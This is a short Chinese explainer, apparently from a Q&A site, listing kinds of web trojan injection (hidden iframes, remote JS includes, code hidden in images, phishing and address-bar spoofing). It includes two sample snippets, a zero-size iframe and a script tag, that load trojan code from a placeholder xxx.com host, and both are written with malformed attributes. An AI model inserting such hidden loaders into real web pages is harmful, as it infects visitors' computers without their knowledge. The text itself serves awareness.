網頁掛馬都有什么類型?

網頁掛馬就是攻擊者通過在正常的頁面中(通常是網站的主頁)插入一段代碼。瀏覽者在打開該頁面的時候，這段代碼被執行，然后下載并運行某木馬的服務器端程序，進而控制瀏覽者的主機。網頁掛馬的類型：

• 框架嵌入式網絡掛馬

  網頁木馬被攻擊者利用iframe語句，加載到任意網頁中都可執行的掛馬形式，是最早也是最有效的的一種網絡掛馬技術。通常的掛馬代碼如下：

    < iframe arc = http://www/xxx/com/muma.html width = 0 height = 0 >< / iframe >

  在打開插入該句代碼的網頁后，就也就打開了http://www.xxx.com/muma.html頁面，但是由于它的長和寬都為“0”，所以很難察覺，非常具有隱蔽性。

• js調用型網頁掛馬

  js掛馬是一種利用js腳本文件調用的原理進行的網頁木馬隱蔽掛馬技術，如：黑客先制作一個.js文件，然后利用js代碼調用到掛馬的網頁。通常代碼如下：

    < script language = javascript arc = http://www.xxx.com/gm.js >< / script >
  

  http://www.xxx.com/gm.js就是一個js腳本文件，通過它調用和執行木馬的服務端。這些js文件一般都可以通過工具生成，攻擊者只需輸入相關的選項就可以了。

• 圖片偽裝掛馬

  攻擊者利用黑客工具軟件將網頁中的木馬代碼植入到圖片文件中，再利用代碼調用執行，是比較新穎的一種掛馬隱蔽方法。

  攻擊者將類似：http://www.xxx.com/test.htm中的木馬代碼植入到test.gif圖片文件中，這些嵌入代碼的圖片都可以用工具生成，攻擊者只需輸入相關的選項就可以了。

• 網絡釣魚掛馬(也稱為偽裝調用掛馬)

網絡中最常見的欺騙手段，黑客們利用人們的獵奇、貪心等心理偽裝構造一個鏈接或者一個網頁，利用社會工程學欺騙方法，引誘點擊，當用戶打開一個看似正常的頁面時，網頁代碼隨之運行，隱蔽性極高。這種方式往往和欺騙用戶輸入某些個人隱私信息，然后竊取個人隱私相關聯。

• 偽裝掛馬

高級欺騙，黑客利用IE或者Fixfox瀏覽器的設計缺陷制造的一種高級欺騙技術，當用戶訪問木馬頁面時地址欄顯示用戶信任地址，其實卻打開了被掛馬的頁面，從而實現欺騙。

回答所涉及的環境：聯想天逸510S、Windows 10。